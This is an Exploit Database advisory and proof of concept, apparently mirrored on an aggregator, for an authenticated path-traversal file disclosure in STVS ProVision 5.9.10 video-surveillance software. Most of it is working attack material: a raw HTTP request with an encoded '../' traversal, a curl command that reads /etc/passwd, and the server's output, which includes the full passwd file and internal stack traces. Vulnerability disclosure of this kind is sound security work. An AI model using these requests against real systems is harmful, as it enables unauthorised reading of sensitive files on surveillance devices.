STVS ProVision 5.9.10 – File Disclosure (Authenticated)

• Exploit Database
• 34 阅读

• 作者： LiquidWorm
  日期： 2021-01-27
• 类别：

  • webapps
  平台：

  • ruby
• 来源：https://www.exploit-db.com/exploits/49481/

• # Exploit Title: STVS ProVision 5.9.10 - File Disclosure (Authenticated)
  # Date: 19.01.2021
  # Exploit Author: LiquidWorm
  # Vendor Homepage: http://www.stvs.ch
  
  
  STVS ProVision 5.9.10 (archive.rb) Authenticated File Disclosure Vulnerability
  
  
  Vendor: STVS SA
  Product web page: http://www.stvs.ch
  Platform: Ruby
  Affected version:5.9.10 (build 2885-3a8219a)
   5.9.9 (build 2882-7c3b787)
   5.9.7 (build 2871-a450938)
   5.9.1 (build 2771-1bbed11)
   5.9.0 (build 2701-6123026)
   5.8.6 (build 2557-84726f7)
   5.7
   5.6
   5.5
  
  Summary: STVS is a Swiss company specializing in development of
  software for digital video recording for surveillance cameras
  as well as the establishment of powerful and user-friendly IP
  video surveillance networks.
  
  Desc: The NVR software ProVision suffers from an authenticated
  arbitrary file disclosure vulnerability. Input passed through
  the files parameter in archive download script (archive.rb) is
  not properly verified before being used to download files. This
  can be exploited to disclose the contents of arbitrary and sensitive
  files.
  
  Tested on: Ubuntu 14.04.3
   nginx/1.12.1
   nginx/1.4.6
   nginx/1.1.19
   nginx/0.7.65
   nginx/0.3.61
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2021-5623
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5623.php
  
  19.01.2021
  
  --
  
  
  #1 LFI Prober (FP):
  -------------------
  
  GET /archive/download?files=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
  Host: 192.168.1.17
  Authorization: Digest username="admin", realm="ProVision", nonce="MjAyMS0wMS0xOSAwMDowNjo0NTo2OTMwMTE6NDk2MmVkNzM2OWIxNzMzNzRjZDc3YzY0NjM3MmNhNz", uri="/archive/download", algorithm=MD5, response="aceffbb0a121570f98a9f4678470a588", opaque="3c837ec895bd5fedcdad8674184de82e", qop=auth, nc=000001ca, cnonce="ebed759486b87a80"
  Accept: application/json, text/javascript, */*
  X-Requested-With: XMLHttpRequest
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Origin: http://192.168.1.17
  Referer: http://192.168.1.17/archive
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  Cookie: last_stream=1; __flash__info=
  Connection: close
  
  HTTP/1.1 500 Not Found
  Server: nginx/1.4.6 (Ubuntu)
  Date: Mon, 18 Jan 2021 23:23:30 GMT
  Content-Type: text/html
  Content-Length: 2727
  Connection: close
  
  <h1>`Archive` application problem</h1><h2>Archive::Controllers::FileDownload.GET</h2><h3>TypeError can't convert nil into String:</h3><ul><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `initialize'</li><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `new'</li><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `get'</li><li>(eval):27:in `send'</li><li>(eval):27:in `service'</li><li>/usr/local/lib/ruby/site_ruby/1.8/ext/security.rb:79:in `service'</li><li>/usr/local/lib/ruby/site_ruby/1.8/ext/forward.rb:54:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/camping-1.5.180/lib/camping/reloader.rb:117:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:53:in `process'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:52:in `synchronize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:52:in `process'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:626:in `process_client'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:625:in `each'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:625:in `process_client'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `initialize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `new'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `initialize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `new'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:282:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:281:in `each'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:281:in `run'</li><li>/usr/local/bin/provision_server:69:in `cloaker_'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:149:in `call'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:149:in `listener'</li><li>/usr/local/bin/provision_server:63:in `cloaker_'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:50:in `call'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:50:in `initialize'</li><li>/usr/local/bin/provision_server:62:in `new'</li><li>/usr/local/bin/provision_server:62</li></ul>
  
  
  #2 LFI Prober (Verified):
  -------------------------
  
  $ curl "http://192.168.1.17/archive//download/%2Fetc%2Fpasswd"
  
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  bin:x:2:2:bin:/bin:/usr/sbin/nologin
  sys:x:3:3:sys:/dev:/usr/sbin/nologin
  sync:x:4:65534:sync:/bin:/bin/sync
  games:x:5:60:games:/usr/games:/usr/sbin/nologin
  man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  libuuid:x:100:101::/var/lib/libuuid:
  syslog:x:101:104::/home/syslog:/bin/false
  mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
  provision:x:999:107::/srv/provision/provision:/bin/bash
  stvs:x:1000:100::/home/stvs:/bin/bash
  usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
  ntp:x:104:108::/home/ntp:/bin/false
  messagebus:x:105:110::/var/run/dbus:/bin/false
  sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
  statd:x:107:65534::/var/lib/nfs:/bin/false
  
  
  --
  Errno::ENOENT No such file or directory - /var/www/index.html:
  
  /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `initialize'
  /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `new'
  /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `get'